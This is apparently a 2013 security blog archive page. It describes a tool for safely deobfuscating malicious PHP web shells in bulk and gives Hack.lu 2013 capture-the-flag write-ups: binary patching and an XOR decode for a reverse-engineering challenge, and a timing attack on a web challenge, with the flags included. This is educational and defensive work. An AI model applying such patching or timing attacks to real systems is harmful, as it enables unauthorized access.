The Cake is a Lie: October 2013

Monday, October 28, 2013

Transformer: mass deobfuscation of php files

During my job I had to deal woth tons of malicious php files per day, let's say about 1000. Most of the files are obfuscated in various ways, from the usage of php-crypt.com up to amateur obfuscation.
Now, if you have to deal with deobfuscation of a single php file you have several opportunities, from web services (like this) to the great php extension created from Stefan Esser evalhook (here is a link of explanation). These strategies are all good if you have a single file, as all of them require user interaction. But what if you have >1000 PHP files per day, and you want to deobfuscate them daily in order to run some similarity tool!?

Let's begin with the basic:
In PHP we basically have two ways of deobfuscating a file and then execute it:
- simple eval function;
- preg_replace with "e" (dear PHP developers, was that really necessary!? a preg_replace with included eval!?);

The main problems when using Evalhook extension over a big number of files are of two categories:
- Evalhook for every "eval" step asks for confirmation of evaluating the code(and that's ok, we can easily automatize a yes answer);
- The file is actually executed while analyzed (and that's not ok at all!)

So what I basically wanted was a way to use Evalhook in an automatic way, in order to let it run over my 1000 files per day, but at the same time I didn't want to execute any part of the code other than the strict necessary for evalhook to do the job.

Typical example of evalhook usage

This is especially important when we are dealing with files created by one author and then used by several others. Most of the web shells I see, in fact, contains a tiny base64 string which is evaluated at run time and which is in charge of sending an e-mail to the creator of the shell (not the one who is actually using it) letting him know that his shell has been uploaded to a certain server. If we run this kind of files with evalhook, and letting him deobfuscating everything, in fact, it will blindly execute all the code up to the point when it reaches the obfuscated part, provoking any sort of damage to the testing machine.

That's why I created Transformer. The principle of Transformer is exactly the one from above: it explores the code, look for any eval/preg_replace with "e" in the code, isolate them, run evalhook over these single pieces and put these pieces back inside the code, allowing for a safer and better deobfuscation.

Details

Transformer run a regex over the file in order to find possible matches (yes, you understood well, it's regex-based). a regex approach has obviously some limitations derived by the nature of regex, but that's the only way to isolate the obfuscated parts of the files without using a PHP parser (which is a very, very hard thing to do) or directly creating a PHP extension (and we don't want any part of the code to run into PHP, in order to be safe against any possible event).
an example of these regex is listed below:

It's important to notice that these regex are made to work over characters. During my experience I saw that an usual way attackers obfuscate their code, other than eval'ing things, is by substituting some of the characters with its hex correspondent. PHP, in fact, accept hex-encoded characters as instructions without any problem.

half hex encoded half ascii!

That's why the whole code, before being splitted, pass through a "decode_hext" function, which is in charge of decoding any hex character into the corresponding ascii.

Once we isolate our obfuscated part of the code, if we are lucky we just give it to evalhook and obtain the decoded version, but what about things like

$a = obfuscated_string;
eval($a)

Transformer is able to match these use-cases by performing a minimal parsing of the code, in order to do some sort of tainting of the variables involved inside the obfuscated parts and attach all operations involving these variables to the obfuscated code. This is particularly useful when dealing with personalised obfuscation, which obfuscate the code via XOR and other operations (personally I also saw something similar to Caesar cypher).

Once we have a script containing both the obfuscated code and any other operations on the variables used during the obfuscation, we let evalhook do his amazing job, obtaining the deobfuscated code.

The output from evalhook is then put back inside the original code, replacing the obfuscated code.

Where It works

Transformer is not intended to be a universal perfect deobfuscator, its strong points are its ability to decode parts of the scripts in an automatic fashion, catching any small obfuscated piece of code and producing the deobfuscated code. It works great when you have massive amounts of obfuscated files and you need the deobfuscated version in order to look at any similarity between the files.

Where It fails

Transformers does not have any knowledge of PHP. Therefore if the obfuscated script goes through several multiline functions before being evaluated, the deobfuscation will fail. There is also a software which obfuscate the script in such a way that during the deobfuscation the script read itself several time, appending determined bytes one next to each other in order to create a new file that will be deobfuscated.
In these cases there are no automatic procedures that can help, as the deobfuscation must be performed by hand checking every single line of evalhook in order to understand when to stop.

Conclusions

What I presented here is a nice way for automatically deobfuscate different PHP files. Obviously we are not as much precise as in a manual analysis (and we don't want to) but if you collect massive amounts of PHP scripts per day, this can be useful.
I obviously created a github repo for the project, I still have to add some example files, the problem is that I only have malicious obfuscated files which I don't want to publish on my github, so I'm creating something ad-hoc!

Notice: even if this tools is meant for having a safer deobfuscation than just using evalhook on the whole script, I still recommend to let the software run in a virtualized machine without connection to the outer world, in order to minimize possibile dangers.

Sunday, October 27, 2013

Hacklu 2013 - Reverse 150 Write-up

Here we are, second post second write-up.
we are going to analyze the reverse 150, a nice win32 executable called RoboAuth. As always, at the end of this post you will find a link to a github repo with the write-up and the original executable so that you can repeat the challenge.

Let's start!

The introduction to the challenge said that the flag should be written as flag1_flag2, therefore we expect to have some kind of double password check.

As always, we start with a "file" command in order to understand some details about the executable, and we find

RoboAuth.exe: PE32 executable for MS Windows (console) Intel 80386 32-bit

Ok,
time for some Windows VM!

Open it and launch it gives you this nice introduction, followed by a request for a password

Very nice, let's see if we find something interesting in the strings of the program.
Strings in ida give us the position where we find the initial text and the "you passed level 1" string inside the executable, nice!
Looking at the code at the location where we find the "you passed level 1" string, we see A LOT of mov instructions and finally what ever password cracker want to see:
scanf
strcmp
puts

Hey, that's easy! so now we know that the program is simply getting at most 20 chars checking against a fixed string and printing out the result, just run it in a debugger, stopping at that point and see at the compared values.
Personally, I do static analysis on ida and dynamic one on ollydbg as I think ida pro debugger sucks, so here is the screenshot of the memory dump from olly

Great!
now we have the 1st password, "R0b0RUlez!", ok let's move on!

After the first password we are requested for a second one.
As before, we look for another string and we can't find it. Ok, so where is the second check?! well we know that the second check is going to do a puts and a scanf, let's look for that function then!
We discover that there is a second scanf in the function at 40157f, so let's look at it!

As we can see, there is a scanf as in the first password scenario, then a call to 401547 and then a test followed by a puts, nice! usual acquire, check and decision based on the check!
the problem here is that when we put a bp on the call sub_401547 instruction we see that the program won't stop, but instead we are stopped on a int 3 instruction.
Fiu, that means, as we can expect from the end of the function before (ExitProcess), that the program for checking the second password is actually another process launched by the father, so in order to debug we should do very nasty tricks etc etc etc (read: I am lazy, if I have another way to acquire the same information why I should not use it!?).

So what we can do!? well actually we have the executable, so why we can't tamper it? as we can see, the parameters used by the function sub_401547 are in positon [esp+38h+var_34] and var_38, one of them is the string acquired through the scanf and the other one is used during the check.. probably our delightful password! the idea is to display it instead of the string displayed by the puts after the check, bypassing the test (obviously). A bunch of NOPS and the edit of

mov eax, ds:dword_40ada4

into

mov eax, ds:dword_40ad98

will do the trick!

nice! here is our beautiful string, "u1nnf2lg\x02" (\x02 being the little face in win32).
let's look at the check function:

even better, the check is just XORing every byte of the solution and checking it with our buffer up to the byte \x02, a one line python operation:

print "".join([chr(ord(el)^2) for el in "u1nnf2lg"])

and we obtain our second password, w3lldone

I find it to be a really nice way to tamper an executable in order to display memory content we can use, especially when using a debugger would require tracing different processes etc..

In the end.. here you will find the github repo with the original file, the tampered file which display the second password and this writeup.

Enjoy!

Saturday, October 26, 2013

Presentation

Hi, My name is Maurizio Abbà, I'm an Information Technology Engineer with a deep interest in security. My main fields are Web Security and Reverse Engineering (yes, because we love opposites!). That means that I spend most of my time (without considering sleeping, cooking and eating) by writing code, looking at an Ida Pro graph or just looking for how to script an operation that I probably won't repeat over the next five years but which I completely refuse to do it by hand.
I love challenges, therefore I'll write here most of my CTF write-ups (starting from HAckLu 2013), always trying to improve myself. Check out my posts, and if you are interest here is my latest CV (I'm always looking for a job, a collaboration or just a new challenge!) My Amazing CV

Hacklu 2013 - Web 200 writeup

Here we are, my first post.
What is the best way to begin a blog? with a write up of course!
So, I participated at Hacklu 2013, but I only managed to solve 4 challenges, Web 200, Reverse 150 and 400. The challenges were very funny, I'm just sorry for wasting a lot of time on web 150 without figuring out the solution (SQL injection in basic authentication!?! The Horror!).
So here is my wirte up for web 200, very easy challenge in my opinion, but still funny!
So at first we are presented with this web page:

Just an image and an input box with a button: insert a key, display "wrong answer".

First things first, let's look at HTML code:

As you can see, we have a form which, upon the click of the button, will do a POST request to /gimmetv with a key, and a nice little script below called key.js.
Let's take a look at the script then:

The script add a listener on the submit, and will send our AJAX request to the server, receiving a JSON containing a "success" field. The most interesting thing here is obviously the xhr.send function, which has a commented &debug parameter.

Doing the same request with the debug parameter will give us the same response with two new fields, "start" and "end". Looks like a timing attack!
Sending the same request with different letters/numbers and looking at the value end-start we can see how this value will almost be the same for all the letters but one, which will have a significant 0.1 difference from the others.

Things are natural then, let's write a small python script in order to accumulate this value up to the point where "success" is true, and look at the response.

This code is not the most performing one, as It does not stop upon the 0.1 threshold (I wanted to be sure to take the maximum, I didn't care too much about its speed) and it checks also for punctuation characters (same reason, I wanted to be sure to get the right result)

In a matter of seconds we have the solution, in the "response" parameter of the JSON response we see "OH_THAT_ARTWORK!"

Maybe this challenge was too easy for 200 points, I expected to have something obfuscated (as far as I remember last year every javascript code was obfuscated), but still, a nice 5 minute exercise!

I created a github repo where you will find:
the writeup
the solver in python
a server which replicate (more or less) the same behavior as the original one so that you can replicate the challenge!

Enjoy!